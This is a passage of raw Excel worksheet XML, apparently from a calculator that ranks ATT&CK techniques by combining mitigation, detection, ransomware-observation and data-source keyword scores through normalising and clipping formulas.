        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.02</v>
      </c>
      <c r="AC356" s="29" t="s">
        <v>467</v>
      </c>
      <c r="AD356" s="25" t="str" cm="1">
        <f t="array" ref="AD356">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC356)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE356" s="25">
        <f>IF(AD356="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF356" s="25" t="str" cm="1">
        <f t="array" ref="AF356">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC356)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG356" s="25">
        <f>IF(AF356="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH356" s="25" t="str" cm="1">
        <f t="array" ref="AH356">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC356)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI356" s="25">
        <f>IF(AH356="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ356" s="25" t="str" cm="1">
        <f t="array" ref="AJ356">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC356)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK356" s="25">
        <f>IF(AJ356="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL356" s="25" t="str" cm="1">
        <f t="array" ref="AL356">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC356)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM356" s="25">
        <f>IF(AL356="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN356" s="61">
        <v>0</v>
      </c>
      <c r="AO356" s="51">
        <v>0</v>
      </c>
      <c r="AP356" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.0476190476190474E-2</v>
      </c>
      <c r="AQ356" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>6.8253968253968247E-2</v>
      </c>
      <c r="AR356" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>6.8253968253968247E-2</v>
      </c>
      <c r="AS356" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT356" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU35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57" spans="1:47" ht="32.1">
      <c r="A357" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.5973333333333333E-2</v>
      </c>
      <c r="B357" s="25">
        <f>SUM(H357,M357,V357)*(1+SUM(AE357,AG357,AI357,AK357,AM357))</f>
        <v>0.22640000000000005</v>
      </c>
      <c r="C357" s="25" t="s">
        <v>1423</v>
      </c>
      <c r="D357" s="25" t="s">
        <v>143</v>
      </c>
      <c r="E357" s="25" t="s">
        <v>1424</v>
      </c>
      <c r="F357" s="51">
        <v>1</v>
      </c>
      <c r="G357" s="51">
        <v>1</v>
      </c>
      <c r="H357" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I357">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J357">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K357">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L357">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M357" s="25">
        <v>0</v>
      </c>
      <c r="N357" s="51">
        <v>0</v>
      </c>
      <c r="O357" s="51">
        <v>1</v>
      </c>
      <c r="P357" s="51">
        <v>0</v>
      </c>
      <c r="Q357" s="51">
        <v>0</v>
      </c>
      <c r="R357" s="52" t="s">
        <v>156</v>
      </c>
      <c r="S357" s="51">
        <v>2</v>
      </c>
      <c r="T357" s="51" t="s">
        <v>157</v>
      </c>
      <c r="U357" s="51">
        <v>8</v>
      </c>
      <c r="V357" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="W357">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>10</v>
      </c>
      <c r="X357">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.18181818181818182</v>
      </c>
      <c r="Y357">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.18181818181818182</v>
      </c>
      <c r="Z357">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA357">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB357">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC357" s="29" t="s">
        <v>1425</v>
      </c>
      <c r="AD357" s="25" t="str" cm="1">
        <f t="array" ref="AD357">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC357)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE357" s="25">
        <f>IF(AD357="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF357" s="25" t="str" cm="1">
        <f t="array" ref="AF357">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC357)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG357" s="25">
        <f>IF(AF357="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH357" s="25" t="str" cm="1">
        <f t="array" ref="AH357">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC357)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI357" s="25">
        <f>IF(AH357="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ357" s="25" t="str" cm="1">
        <f t="array" ref="AJ357">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC357)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK357" s="25">
        <f>IF(AJ357="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL357" s="25" t="str" cm="1">
        <f t="array" ref="AL357">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC357)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM357" s="25">
        <f>IF(AL357="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN357" s="60">
        <v>1</v>
      </c>
      <c r="AO357" s="51">
        <v>1</v>
      </c>
      <c r="AP357" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.5973333333333333E-2</v>
      </c>
      <c r="AQ357" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>7.5466666666666682E-2</v>
      </c>
      <c r="AR357" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>7.5466666666666682E-2</v>
      </c>
      <c r="AS357" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT357" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU35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58" spans="1:47">
      <c r="A358" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.333333333333333E-2</v>
      </c>
      <c r="B358" s="25">
        <f>SUM(H358,M358,V358)*(1+SUM(AE358,AG358,AI358,AK358,AM358))</f>
        <v>0.2</v>
      </c>
      <c r="C358" s="25" t="s">
        <v>1426</v>
      </c>
      <c r="D358" s="25" t="s">
        <v>339</v>
      </c>
      <c r="E358" s="25" t="s">
        <v>1427</v>
      </c>
      <c r="F358" s="51">
        <v>1</v>
      </c>
      <c r="G358" s="51">
        <v>1</v>
      </c>
      <c r="H358" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I358">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J358">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K358">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L358">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M358" s="25">
        <v>0</v>
      </c>
      <c r="N358" s="51">
        <v>0</v>
      </c>
      <c r="O358" s="51">
        <v>3</v>
      </c>
      <c r="P358" s="51">
        <v>0</v>
      </c>
      <c r="Q358" s="51">
        <v>0</v>
      </c>
      <c r="R358" s="51" t="s">
        <v>340</v>
      </c>
      <c r="S358" s="51">
        <v>2</v>
      </c>
      <c r="T358" s="51" t="s">
        <v>303</v>
      </c>
      <c r="U358" s="51">
        <v>7</v>
      </c>
      <c r="V358" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="W358">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>9</v>
      </c>
      <c r="X358">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.16363636363636364</v>
      </c>
      <c r="Y358">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.16363636363636364</v>
      </c>
      <c r="Z358">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>3</v>
      </c>
      <c r="AA358">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.03</v>
      </c>
      <c r="AB358">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.03</v>
      </c>
      <c r="AC358" s="29" t="s">
        <v>341</v>
      </c>
      <c r="AD358" s="25" t="str" cm="1">
        <f t="array" ref="AD358">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC358)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE358" s="25">
        <f>IF(AD358="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF358" s="25" t="str" cm="1">
        <f t="array" ref="AF358">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC358)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG358" s="25">
        <f>IF(AF358="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH358" s="25" t="str" cm="1">
        <f t="array" ref="AH358">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC358)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI358" s="25">
        <f>IF(AH358="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ358" s="25" t="str" cm="1">
        <f t="array" ref="AJ358">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC358)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK358" s="25">
        <f>IF(AJ358="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL358" s="25" t="str" cm="1">
        <f t="array" ref="AL358">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC358)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM358" s="25">
        <f>IF(AL358="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN358" s="62">
        <v>1</v>
      </c>
      <c r="AO358" s="51">
        <v>1</v>
      </c>
      <c r="AP358" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.333333333333333E-2</v>
      </c>
      <c r="AQ358" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>6.6666666666666666E-2</v>
      </c>
      <c r="AR358" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>6.6666666666666666E-2</v>
      </c>
      <c r="AS358" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT358" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU35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59" spans="1:47" ht="32.1">
      <c r="A359" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.2640000000000004E-2</v>
      </c>
      <c r="B359" s="25">
        <f>SUM(H359,M359,V359)*(1+SUM(AE359,AG359,AI359,AK359,AM359))</f>
        <v>0.22640000000000005</v>
      </c>
      <c r="C359" s="25" t="s">
        <v>1428</v>
      </c>
      <c r="D359" s="25" t="s">
        <v>143</v>
      </c>
      <c r="E359" s="25" t="s">
        <v>1429</v>
      </c>
      <c r="F359" s="51">
        <v>1</v>
      </c>
      <c r="G359" s="51">
        <v>1</v>
      </c>
      <c r="H359" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I359">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J359">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K359">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L359">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M359" s="25">
        <v>0</v>
      </c>
      <c r="N359" s="51">
        <v>0</v>
      </c>
      <c r="O359" s="51">
        <v>1</v>
      </c>
      <c r="P359" s="51">
        <v>0</v>
      </c>
      <c r="Q359" s="51">
        <v>0</v>
      </c>
      <c r="R359" s="52" t="s">
        <v>156</v>
      </c>
      <c r="S359" s="51">
        <v>2</v>
      </c>
      <c r="T359" s="51" t="s">
        <v>157</v>
      </c>
      <c r="U359" s="51">
        <v>8</v>
      </c>
      <c r="V359" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="W359">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>10</v>
      </c>
      <c r="X359">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.18181818181818182</v>
      </c>
      <c r="Y359">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.18181818181818182</v>
      </c>
      <c r="Z359">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA359">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB359">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC359" s="29" t="s">
        <v>1430</v>
      </c>
      <c r="AD359" s="25" t="str" cm="1">
        <f t="array" ref="AD359">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC359)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE359" s="25">
        <f>IF(AD359="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF359" s="25" t="str" cm="1">
        <f t="array" ref="AF359">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC359)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG359" s="25">
        <f>IF(AF359="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH359" s="25" t="str" cm="1">
        <f t="array" ref="AH359">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC359)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI359" s="25">
        <f>IF(AH359="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ359" s="25" t="str" cm="1">
        <f t="array" ref="AJ359">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC359)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK359" s="25">
        <f>IF(AJ359="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL359" s="25" t="str" cm="1">
        <f t="array" ref="AL359">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC359)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM359" s="25">
        <f>IF(AL359="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN359" s="52">
        <v>0</v>
      </c>
      <c r="AO359" s="51">
        <v>0</v>
      </c>
      <c r="AP359" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.2640000000000004E-2</v>
      </c>
      <c r="AQ359" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>7.5466666666666682E-2</v>
      </c>
      <c r="AR359" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>7.5466666666666682E-2</v>
      </c>
      <c r="AS359" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT359" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU35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60" spans="1:47">
      <c r="A360" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.3959999999999999E-2</v>
      </c>
      <c r="B360" s="25">
        <f>SUM(H360,M360,V360)*(1+SUM(AE360,AG360,AI360,AK360,AM360))</f>
        <v>0.23960000000000001</v>
      </c>
      <c r="C360" s="25" t="s">
        <v>1431</v>
      </c>
      <c r="D360" s="25" t="s">
        <v>984</v>
      </c>
      <c r="E360" s="25" t="s">
        <v>1432</v>
      </c>
      <c r="F360" s="51">
        <v>1</v>
      </c>
      <c r="G360" s="51">
        <v>1</v>
      </c>
      <c r="H360" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I360">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J360">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K360">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L360">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M360" s="25">
        <v>0</v>
      </c>
      <c r="N360" s="51">
        <v>0</v>
      </c>
      <c r="O360" s="51">
        <v>1</v>
      </c>
      <c r="P360" s="51">
        <v>0</v>
      </c>
      <c r="Q360" s="51">
        <v>2</v>
      </c>
      <c r="R360" s="57">
        <v>3.1</v>
      </c>
      <c r="S360" s="51">
        <v>1</v>
      </c>
      <c r="T360" s="51" t="s">
        <v>1433</v>
      </c>
      <c r="U360" s="51">
        <v>8</v>
      </c>
      <c r="V360" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="W360">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>9</v>
      </c>
      <c r="X360">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.16363636363636364</v>
      </c>
      <c r="Y360">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.16363636363636364</v>
      </c>
      <c r="Z360">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>3</v>
      </c>
      <c r="AA360">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.03</v>
      </c>
      <c r="AB360">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.03</v>
      </c>
      <c r="AC360" s="29" t="s">
        <v>97</v>
      </c>
      <c r="AD360" s="25" t="str" cm="1">
        <f t="array" ref="AD360">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC360)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE360" s="25">
        <f>IF(AD360="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF360" s="25" t="str" cm="1">
        <f t="array" ref="AF360">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC360)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG360" s="25">
        <f>IF(AF360="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH360" s="25" t="str" cm="1">
        <f t="array" ref="AH360">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC360)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI360" s="25">
        <f>IF(AH360="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ360" s="25" t="str" cm="1">
        <f t="array" ref="AJ360">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC360)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK360" s="25">
        <f>IF(AJ360="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL360" s="25" t="str" cm="1">
        <f t="array" ref="AL360">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC360)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM360" s="25">
